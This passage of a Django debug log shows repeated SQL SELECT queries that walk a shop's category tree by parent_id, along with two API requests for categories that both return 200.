"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:10:06,446 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:10:06,449 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:10:06,455 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:10:06,459 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:10:06,463 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:10:06,467 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:10:06,470 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:10:06,474 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:06,479 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:10:06,483 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:10:06,487 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:10:06,490 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:10:06,493 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:10:06,499 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:10:06,502 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:10:06,505 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:10:06,508 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:10:06,510 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:10:06,515 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:10:06,518 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:10:06,521 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:10:06,524 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:10:06,527 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:10:06,529 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:10:06,533 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:10:06,536 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:10:06,539 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:10:06,542 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:10:06,546 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:10:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:10:31,371 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:10:31,381 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:10:31,386 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:10:31,388 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:31,392 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:10:31,394 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:10:31,401 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:10:31,403 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:10:31,406 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:10:31,409 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:31,412 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:31,415 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:10:31,418 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) [13/Dec/2019 14:10:31] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:10:31,421 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:10:31,423 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:10:31,426 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:10:31,430 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:10:31,433 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:10:31,437 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:10:31,440 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:10:31,444 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:10:31,449 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:10:31,453 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:10:31,456 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:10:31,459 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:10:31,462 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:10:31,466 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:31,470 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:10:31,473 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:10:31,476 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:10:31,479 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:10:31,482 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:10:31,486 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:10:31,491 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:10:31,494 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:10:31,497 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:10:31,500 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:10:31,505 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY 